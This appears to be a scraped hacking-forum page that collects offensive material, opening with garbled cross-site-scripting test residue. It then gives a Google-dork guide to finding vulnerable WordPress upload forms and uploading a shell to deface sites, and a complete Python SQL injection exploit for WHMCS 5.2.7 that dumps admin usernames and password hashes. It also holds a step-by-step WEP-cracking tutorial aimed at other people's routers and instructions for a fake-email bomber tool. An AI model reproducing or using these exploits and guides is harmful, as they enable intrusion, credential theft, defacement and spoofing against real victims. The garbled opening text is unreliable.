testesteatwateatest

"> "> ">

Cross site Scripting by JP

click me! "> "> ">

Cross site Scripting by JP

click me! "> "> ">

Cross site Scripting by JP

click me! "> "> ">

Cross site Scripting by JP

click me! "> "> ">

Cross site Scripting by JP

click me! "> "> ">

Cross site Scripting by JP

click me! ">

fff

">">"> "> vg>

“>

“>
“>
“>

WORDPRESS EXPLOIT

You Can Hack Thousands of WordPress Websites With This Exploit.
And Thousands of WordPress websites Are Vulnerable For This Attack

Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


Step 1
Open Google.com and Enter Any One Google Dork which Given,

Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….

Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere

WHMCS 5.x.x SQL INJECTION

WHMCS 5.2.7 SQL Injection (2013.10.04)

Wink

Code:

#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability

url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"

def exploit(sql):
print "Doing stuff: %s" % sql
r = urlopen(Request('%sclientarea.php?action=details' % url,
data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
anges" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua,
"Cookie": user[0]})).read()
return re.search(r'(id="firstname" value="(.*?)")', r).group(2)

def login():
print "Getting CSRF token"
r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r.read()).group(2)
cookie = r.info()['set-cookie'].split(';')[0]
print "Logging in"
r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email,
user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
if 'dologin.php' in r:
sys.exit('Unable to login')
else:
return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r).group(2)]

user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get
admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients

# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
x)#" % user_email)

--------------------------------------------------------------------------------------------------------
References:

http://localhost.re/p/whmcs-527-vulnerability

WEP CRACKING TUTORIAL

WEP Cracking with Backtrack

First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

Login: root
Password: toor


Once logged in, type in: startx
BT4 is now set up, heres the following.
==

WEP CRACK GUIDE


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start


2. Now we are going to put the network card into monter mode by typing the following.

airmon-ng

(You will find your Interface here)

3. So first start up the scan

airmon-ng start wlan0 or 1

(depends on what it reads your card as, replace as needed)

4.Lets spoof your MAC address first by typing this next command.

ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up


This will make it so we change our MAC address to the computer we are connecting to

5.Time to start finding our victims router, type in konsole.

airodump-ng mon0

This will show the list and once you find one that suits your interest, Continue.

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole

airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)

example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0


7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:

aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0


8. Almost done, we just need to contune the ARP cycle, open another konsole and type:

aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.


Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.

9. Time to start cracking that cap file :D Open a new konsole and type.

aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap


10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)

Here is some alternate methods of using backtrack to get from Hakunamatata69 Tutorial that are interesting and work too.


==
---ALTERNATE ATTACKS---
FRAGMENTATION
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
--
NOTES
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Send Fake Email / Bomber / Custom Email Address TOOL DOWNLOAD


First, download the program [UPDATED VERSION!] here

VirusTotal

after downloading the program, run it and the program looks like this
[Image: screenshot_17.png]

now fill all text field on the application



[Image: screenshot_17.png]

after you fill up all textfields, then click Send Email button and wait till you got message box.

done. Your email was successfully sent to the target. your email will be entered in the Inbox folder (tested on my GMail)